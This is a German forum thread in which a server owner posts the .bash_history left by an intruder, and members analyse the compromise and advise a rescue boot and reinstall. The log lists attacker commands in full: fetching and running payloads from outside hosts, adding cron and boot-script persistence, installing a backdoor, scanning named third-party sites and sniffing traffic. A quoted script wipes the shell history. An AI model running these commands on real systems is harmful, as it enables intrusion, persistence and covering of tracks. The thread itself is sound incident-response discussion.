Server wurde gehackt *_*

[oxygen]

Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)

Für den Fall, dass ich mich jetzt lächerlich mache, aber ich bin so paranoid, und mach die "gefährlichen" Befehle immer auf 000, dann kann sie keiner ausführen, und wenn ich mal brauch kann man ja kurzzeitig umändern.

Das macht keinen Unterschied. 700 heißt nur root kann sie ausführen, und der kann die Zugriffrechte sowieso immer ändern.

[demo]

hier ist .bash_history

Code: Select all

rm ps.htm
cd /home/www
ls
ls -al
cd /etc
ls nam*
cat named.conf |grep zone
locate httpd.conf
cat /etc/httpd/httpd.conf |grep ServerName 
cd /var/tmp/...
wget http://www.btnx.com/ht.ocx
chmod 7777 *
./ht.ocx /
cd /etc/rc.d/init.d
cd /etc/init.d
wget www.pocketpctools.com/brkt
chmod 7777 brkt
mv brkt netfsd
cp netfsd /sbin/lnx86
chmod 7777 /sbin/lnx86
cd ..
cd rc.d
cat rc.local
ls
cat boot.local
echo /etc/init.d/netfsd >> boot.local
chmod 7777 /etc.init.d/netfsd
chmod 7777 /etc/init.d/netfsd
cd /var/spool
ls
cd cron
ls
cat root
echo "0 0 7 7 * /sbin/lnx86 " >> root
cd /var/tmp
ls
ls -al
cd ...
ls
rm *
wget www.pocketpctools.com/mass.sh
chmod 7777 *
./mass.sh /
pwd
wget www.pocketpctools.com/str.tgz
wget www.pocketpctools.com/str.tar.gz
tar zxvf str*
cd strobe
ls
mv strobe s
wget 200.177.162.127/lista.txt
wget 200.177.162.127/lista.txt
./s
rm lista.txt
wget 200.177.162.127/lista.txt
./s
./s -v -V -s -o lll -t 5 -n 1000 -S strobe.services -i lista.txt -f
who
finger ircd
rm brk
who
cd /root/
ls
./bin
cd bin
ls
wget http://ka0tic.topcities.com/xpl/toy.tgz
tar -zxvf toy.tgz;rm toy.tgz;cd toy;./setup 123qwe 60922
cd ..
rm -rf toy
rm ps.htm
mkdir .p
cd .p
wget 200.177.162.127/amap.tar.gz
tar zxvf amap*
cd amap-4.5
lls
ls
./configure
make
ls
./amap
./amap -A -bHdvq -o logzz www.terra.com.br
./amap -A -bHdvq -o logzz www.terra.coom.br 80
./amap -A -bHdvq -o logzz www.canalmarilia.com.br 80
./amap -A -bHdvq -o logzz 200.210.235.147 80
wget http://www.thc.org/download.php?t=r&f=thcrut-1.2.5.tar.gz
a
wget 200.177.162.127/thcrut.tar.gz
tar zxvf thcrut.t*
cd thcrut-1.2.5
ls
./configure
make all install; thcrut -h
wget 200.177.162.127/probe.tar.gz
tar zxvf probe*
cd probe-4.1
ls
./probe
./probe www.canalmarilia.com.br
./probe www.mac0nha.com
./probe -p www.canalmarilia.com.br
q
q
./probe www.uol.com.br
./probe -p www.uol.com.br
rm -rf *
wget 200.177.162.127/uht1.tgz
tar zxvf uht1*
ls -al
tar zxvf Col*
cd Collector-1.0
ls
cat README
ls
ls -al
cd Server
ls -al
make
ls
./collector
cd ..
ls
cat TODO
cd ..
ls
tar zxvf Hun*
cd Hunter-1.2
ls
make
ls
cat README
wget 200.177.162.127/snif.tar.gz
tar zxvf snif*
cd sniffit.0.3.5
ls -al
./configure
make
ls
./sniffit -h
cp sniffit /home/www/web6/html/sniffit
./sniffit
mkdir ...
cd ...
wget 200.177.162.127/sn.tar.gz
tar zxvf sn.t*
cd sniffit.0.3.7.beta
ls
sh install-sh
./install-sh
./configure
make
ls
rm /home/www/web6/html/sniffit
cp sniffit /home/www/web6/html/sniffit
./sniffit
./sniffit -v
ifconfig
./sniffit
./sniffit -P TCP -r /tmp/.snl -F eth0
uname -a
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP 
rm ps.htm
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP &
ls -al .snl
ls -al .snl
rm -rf .snl
ls -al .snl
ls -al .snl
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
ls -al .snl
./sniffit -t 217.160.92.159 -R /tmp/.snl
./sniffit -t 217.160.92.159 -R /tmp/.sn
./sniffit -t 217.160.92.159 -R /tmp/.sn -F eth0
ls -al .sn*
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP &
ls -al .sn*
pwd
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
ps x
kill -9 6114
ps x
 PROMPT_COMMAND='pwd>&7;kill -STOP $$'

ganze index geändert
wo ist er rein gekommen und was hat er alles installiert ?

[wirsing]

Keine Ahnung, das kann man daran nicht sehen.
1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat
2. Alle Befehle in dieser Datei wurden - wenn man einmal davon ausginge, dass die .bash_history wirklich das beschreibt, was der Angreifer gemacht hat - erst nach dem Eindringen ausgeführt, lassen also keine Rückschlüsse über den Weg dorthin zu.
3. Fahr den Server zuerst ins Rettungssystem, überleg dir dann ob du Anzeige erstatten willst, aber boote nicht mehr ins normale System. Danach solltest du den Server neu initialisieren lassen oder selber neu installieren.

[demo]

danke dir, mit anzeige wird es nichts, lasse den server lieber neu installieren.

[captaincrunch]

1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat

Gut kombiniert, Watson:

Code: Select all

[chris@shadow kiddie]$ head -8 ht.ocx
#coded By kieger
clear
if [ "$1" != "" ]
then
echo "Disable and Clean bash_history Command LOG"
echo "" > /root/.bash_history
echo "bash_history Command LOG is Disabled and Cleaned"
echo ""

danke dir, mit anzeige wird es nichts, lasse den server lieber neu installieren.

...damit die Kiste danach sofort wieder zur einfachen Beute wird?

[demo]

...damit die Kiste danach sofort wieder zur einfachen Beute wird?

@CaptainCrunch, auch nach dem neu installation oder wie ?

[wirsing]

Ach ja - und schau dir mal noch kurz das an, DEMO: http://zone-h.org/en/defacements/filter ... 60.92.159/

[demo]

alles in eimer jetzt

[captaincrunch]

Ja, denn anscheinennd hat das Kiddie keine Probleme gehabt, deine Kiste (wodurch auch immer) zu rooten.

Btw.: Kleine Analyse der runtergeladenen Tools:
1. brkt
Verbindet sich ins IRC, kann Files downloaden, DOSsen und ein paar andere Kleinigkeiten.

2. ht.ocx:
"Reinigt" die .bash_history, grabbelt den Servernamen aus der httpd.conf

3. mass.sh:
Kleines Mass-Defacement-Script, das u.U. auch noch weitere Hintertüren ins System einbaut

4. amap:

Amap is a next-generation scanning tool, which identifies applications and services even if they are not listening on the default port by creating a bogus-communication and analyzing the responses.

5. strobe:
Relativ einfacher Scanner

In Kurzform: deine Kiste ist eine Gefahr für sämtliche andere Netzteilnehmer.

[wirsing]

Das Ganze sieht mir noch nicht sehr nach Rescuesystem aus. Worauf wartest du noch? Bist du dir dessen bewusst, welchen Wert dein Rootserver auch als Waffe haben kann?

[captaincrunch]

1. Komplettes ACK zu wirsings letztem Satz.

2.

2.4.21-lufs-030704

Die Frage, wodurch du gerootet wurdest ist jetzt nicht dein Ernst, oder?

[demo]

habe ihn jetzt runter gefahren, ich hatte heute mittag einen auf irc opper access gegeben mit vollem irc root zugriff rechte, aber kann er mit dem sich per schell einloggen?

[demo]

http://www.google.de/search?sourceid=na ... s%2D030704

was genau ist den das Captain ?

war der Kernel Version schuld

[captaincrunch]

Ist die Frage dein Ernst? Die Antwort findest du zuhauf hier im Forum.

[demo]

ok ich suche dann mal

[captaincrunch]

Da dur des Rätsels Lösung ja wirklich nicht zu kennen scheinst: der von dir eingesetzte Kernel enthält mehrere Sicherheitslücken, durch die (immerhin) lokale User root-Rechte erhalten können, was wohl auch hier mit ziemlicher Sicherheit der Fall war.
Die Frage, wie derjenige auf's System kam, lässt sich ohne weitere Kenntnis deines Systems nicht beantworten, aber ich rate einfach mal: PHPNuke!?!

Wie auch immer: alleine die Tatsache, dass du anscheinend nicht durch die Security-Mailingliste(n) deines Distributors aufgeschreckt worden bist zeigt eigentlich, dass du grob fahrlässig gehandelt hast.

[demo]

Capitain hast recht, habe mich nicht so für die sicherheit gekümmert, und wie ich denke war phpbb die haupt tüer,
ist bei suse 9.0 der kernel jetzt sicherer ?

[captaincrunch]

ist bei suse 9.0 der kernel jetzt sicherer ?

Ein ein gefixter Kernel deiner alten Version hätte bereits gereicht.

[Outlaw]

Capitain hast recht, habe mich nicht so für die sicherheit gekümmert, und wie ich denke war phpbb die haupt tüer,
ist bei suse 9.0 der kernel jetzt sicherer ?

PHPBB ?? Wie alt waren denn die Foren ??

Gruß Outi

[captaincrunch]

phpbb kann ich mir spontan auch nicht vorstellen, da seit geraumer Zeit da zwar Lücken aufgetaucht sind, diese aber normalerweise einem Angreifer keine Shell geliefert hätten.

Na ja, wie gesagt: man kann nur vermuten. Wenn du sämtliche Updates so gehandhabt hast, gibt's da diverse Möglichkeiten, wie derjenige rankam.

[demo]

die phpbb version war wie hier im forum, da hatte mich schon jemand gewarnt wegen der sicherheitslücke in phpbb mit dem mann root pass auslesen kann, deshalb sollte ein patch drauf machen aber war zu spät.

[captaincrunch]

da hatte mich schon jemand gewarnt wegen der sicherheitslücke in phpbb mit dem mann root pass auslesen kann, deshalb sollte ein patch drauf machen aber war zu spät.

Das "root pass" hat im Allgemeinen nichts mit dem Admin-Passwort des phpbb zu tun; auch wir hier waren Opfer eines solchen Angriffs, das ganze betraf aber ausschließlich das phpbb, derjenige kam totzdem nicht annähernd ans darunterliegende System.
Sofern man natürlich so dämlich ist (sorry, aber anders lässt sich das dann nicht mehr sagen), die gleichen Passwörter dafür einzusetzen ist man wirklich selbst Schuld.

[theomega]

bringt aber auch nichts, da phpbb das passwort md5hasht, also man dann wieder bruteforce bräuchte!